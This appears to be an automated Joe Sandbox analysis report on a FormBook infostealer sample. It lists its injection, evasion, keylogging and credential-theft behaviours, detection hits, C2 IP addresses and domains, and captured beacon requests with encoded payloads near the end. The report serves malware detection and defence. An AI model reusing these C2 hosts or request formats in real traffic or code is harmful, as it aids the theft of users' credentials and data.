Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3HnH4uJtE7.exe

Overview

General Information

Sample name:3HnH4uJtE7.exe
renamed because original name is a hash value
Original sample name:cb8928597d08e9bb6c3c7ee9df7eb836df1f85a9668054765dd6eb75a33516a3.exe
Analysis ID:1587863
MD5:b88bab75a48b9fefcd3395afa9891d69
SHA1:d35d41a4330b17b8518204a483b8f4800012718a
SHA256:cb8928597d08e9bb6c3c7ee9df7eb836df1f85a9668054765dd6eb75a33516a3
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 3HnH4uJtE7.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\3HnH4uJtE7.exe" MD5: B88BAB75A48B9FEFCD3395AFA9891D69)
    • svchost.exe (PID: 6260 cmdline: "C:\Users\user\Desktop\3HnH4uJtE7.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • wdFhguqpcrad.exe (PID: 3220 cmdline: "C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wiaacmgr.exe (PID: 348 cmdline: "C:\Windows\SysWOW64\wiaacmgr.exe" MD5: 2F1D379CE47E920BDDD2C50214457E0F)
          • wdFhguqpcrad.exe (PID: 1780 cmdline: "C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4488 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000001.00000002.1962969685.00000000031C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.1962529025.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\3HnH4uJtE7.exe", CommandLine: "C:\Users\user\Desktop\3HnH4uJtE7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\3HnH4uJtE7.exe", ParentImage: C:\Users\user\Desktop\3HnH4uJtE7.exe, ParentProcessId: 6988, ParentProcessName: 3HnH4uJtE7.exe, ProcessCommandLine: "C:\Users\user\Desktop\3HnH4uJtE7.exe", ProcessId: 6260, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\3HnH4uJtE7.exe", CommandLine: "C:\Users\user\Desktop\3HnH4uJtE7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\3HnH4uJtE7.exe", ParentImage: C:\Users\user\Desktop\3HnH4uJtE7.exe, ParentProcessId: 6988, ParentProcessName: 3HnH4uJtE7.exe, ProcessCommandLine: "C:\Users\user\Desktop\3HnH4uJtE7.exe", ProcessId: 6260, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T18:51:25.795128+010028554641A Network Trojan was detected192.168.2.449737185.199.109.15380TCP
                2025-01-10T18:51:28.331852+010028554641A Network Trojan was detected192.168.2.449745185.199.109.15380TCP
                2025-01-10T18:51:30.986881+010028554641A Network Trojan was detected192.168.2.449763185.199.109.15380TCP
                2025-01-10T18:51:39.939047+010028554641A Network Trojan was detected192.168.2.449811104.21.48.23380TCP
                2025-01-10T18:51:42.299443+010028554641A Network Trojan was detected192.168.2.449824104.21.48.23380TCP
                2025-01-10T18:51:44.931042+010028554641A Network Trojan was detected192.168.2.449835104.21.48.23380TCP
                2025-01-10T18:51:53.072305+010028554641A Network Trojan was detected192.168.2.449882199.59.243.22880TCP
                2025-01-10T18:51:55.715369+010028554641A Network Trojan was detected192.168.2.449898199.59.243.22880TCP
                2025-01-10T18:51:58.226136+010028554641A Network Trojan was detected192.168.2.449913199.59.243.22880TCP
                2025-01-10T18:52:07.165397+010028554641A Network Trojan was detected192.168.2.4499658.136.96.10680TCP
                2025-01-10T18:52:09.706978+010028554641A Network Trojan was detected192.168.2.4499818.136.96.10680TCP
                2025-01-10T18:52:12.284358+010028554641A Network Trojan was detected192.168.2.4499948.136.96.10680TCP
                2025-01-10T18:52:20.548786+010028554641A Network Trojan was detected192.168.2.45001969.57.163.6480TCP
                2025-01-10T18:52:23.174021+010028554641A Network Trojan was detected192.168.2.45002069.57.163.6480TCP
                2025-01-10T18:52:25.681094+010028554641A Network Trojan was detected192.168.2.45002169.57.163.6480TCP
                2025-01-10T18:52:34.654525+010028554641A Network Trojan was detected192.168.2.450023170.33.13.24680TCP
                2025-01-10T18:52:37.266816+010028554641A Network Trojan was detected192.168.2.450024170.33.13.24680TCP
                2025-01-10T18:52:39.932449+010028554641A Network Trojan was detected192.168.2.450025170.33.13.24680TCP
                2025-01-10T18:52:48.100839+010028554641A Network Trojan was detected192.168.2.45002766.235.200.14580TCP
                2025-01-10T18:52:50.700863+010028554641A Network Trojan was detected192.168.2.45002866.235.200.14580TCP
                2025-01-10T18:52:53.207752+010028554641A Network Trojan was detected192.168.2.45002966.235.200.14580TCP
                2025-01-10T18:53:02.706420+010028554641A Network Trojan was detected192.168.2.45003185.159.66.9380TCP
                2025-01-10T18:53:05.362913+010028554641A Network Trojan was detected192.168.2.45003285.159.66.9380TCP
                2025-01-10T18:53:07.909571+010028554641A Network Trojan was detected192.168.2.45003385.159.66.9380TCP
                2025-01-10T18:53:15.725954+010028554641A Network Trojan was detected192.168.2.450035156.253.8.11580TCP
                2025-01-10T18:53:18.301031+010028554641A Network Trojan was detected192.168.2.450036156.253.8.11580TCP
                2025-01-10T18:53:21.087237+010028554641A Network Trojan was detected192.168.2.450037156.253.8.11580TCP
                2025-01-10T18:53:29.024786+010028554641A Network Trojan was detected192.168.2.45003913.248.169.4880TCP
                2025-01-10T18:53:32.487730+010028554641A Network Trojan was detected192.168.2.45004013.248.169.4880TCP
                2025-01-10T18:53:34.086977+010028554641A Network Trojan was detected192.168.2.45004113.248.169.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T18:51:30.986881+010028563181A Network Trojan was detected192.168.2.449763185.199.109.15380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: 3HnH4uJtE7.exeVirustotal: Detection: 69%Perma Link
                Source: 3HnH4uJtE7.exeReversingLabs: Detection: 78%
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1962969685.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1962529025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3560926994.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1963457204.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 3HnH4uJtE7.exeJoe Sandbox ML: detected
                Source: 3HnH4uJtE7.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wdFhguqpcrad.exe, 00000003.00000002.3560021834.00000000006DE000.00000002.00000001.01000000.00000005.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3560022524.00000000006DE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 3HnH4uJtE7.exe, 00000000.00000003.1741115369.0000000003430000.00000004.00001000.00020000.00000000.sdmp, 3HnH4uJtE7.exe, 00000000.00000003.1742033212.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963011131.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1866930699.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868964920.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963011131.000000000349E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3561222792.000000000480E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1962662464.000000000431B000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1964647387.00000000044C4000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3561222792.0000000004670000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 3HnH4uJtE7.exe, 00000000.00000003.1741115369.0000000003430000.00000004.00001000.00020000.00000000.sdmp, 3HnH4uJtE7.exe, 00000000.00000003.1742033212.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1963011131.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1866930699.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868964920.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963011131.000000000349E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, wiaacmgr.exe, 00000006.00000002.3561222792.000000000480E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1962662464.000000000431B000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1964647387.00000000044C4000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3561222792.0000000004670000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wiaacmgr.pdbGCTL source: svchost.exe, 00000001.00000003.1930867669.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1930942129.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560592056.0000000001497000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wiaacmgr.pdb source: svchost.exe, 00000001.00000003.1930867669.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1930942129.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560592056.0000000001497000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: wiaacmgr.exe, 00000006.00000002.3561555104.0000000004C9C000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3560220883.000000000098F000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2028220729.000000000323C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2247814449.00000000170EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: wiaacmgr.exe, 00000006.00000002.3561555104.0000000004C9C000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3560220883.000000000098F000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2028220729.000000000323C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2247814449.00000000170EC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0094DBBE
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009568EE FindFirstFileW,FindClose,0_2_009568EE
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0095698F
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0094D076
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0094D3A9
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00959642
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0095979D
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00959B2B
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00955C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00955C97
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0069C9D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0069C9D0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 4x nop then xor eax, eax6_2_00689E50
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 4x nop then pop edi6_2_0068E59E
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 4x nop then mov ebx, 00000004h6_2_045604E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 185.199.109.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 185.199.109.153:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49763 -> 185.199.109.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49835 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 185.199.109.153:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49898 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49811 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49965 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 156.253.8.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49994 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 66.235.200.145:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49824 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 170.33.13.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 66.235.200.145:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49882 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49981 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 66.235.200.145:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 170.33.13.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49913 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 156.253.8.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 170.33.13.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 156.253.8.115:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.juewucangku.xyz
                Source: DNS query: www.startsomething.xyz
                Source: Joe Sandbox ViewIP Address: 66.235.200.145 66.235.200.145
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
                Source: Joe Sandbox ViewASN Name: FORTRESSITXUS FORTRESSITXUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0095CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0095CE44
                Source: global trafficHTTP traffic detected: GET /3e00/?Ol=yN0LtN-HDTPXX&3h=vcWi2Nuzfs8bFUYHM3WHAx3tRht2hRDvXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCKhn1cqd0Bfa9GTR6+v7wltgiOCNeedM3Uw1s= HTTP/1.1Host: www.goldbracelet.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /k3hn/?3h=dZddn2QnmIt3Z4ttbkFYhAUU7sI66h1hr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs81kIy3BeJTiV4odLQ2svXpZKiEE3Qz4K+Ay4=&Ol=yN0LtN-HDTPXX HTTP/1.1Host: www.pku-cs-cjw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /al74/?Ol=yN0LtN-HDTPXX&3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/QA/O7XoGzbwB5f8pjnqeubu12DlOLexf3g= HTTP/1.1Host: www.ausyva4.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /cfcv/?3h=yFDcd28s49uqEHKqlww2Cwyic4spmP25HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/RH93IVoJN7NWkPDeisF5hKGdeLzaAp6KdnI=&Ol=yN0LtN-HDTPXX HTTP/1.1Host: www.969-usedcar02.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0sm5GF01YtOiDz9nk9gyiJeQf3o0kWy0t0k=&Ol=yN0LtN-HDTPXX HTTP/1.1Host: www.juewucangku.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                Source: global trafficHTTP traffic detected: GET /9er8/?3h=y0ZQaQGYytoPYKDe8bY9jaat1pADepFe7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaaVhngwU9AnEVouJjO4g3krxQAVkSYZ/9aI0=&Ol=yN0LtN-HDTPXX HTTP/1.1Host: www.startsomething.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
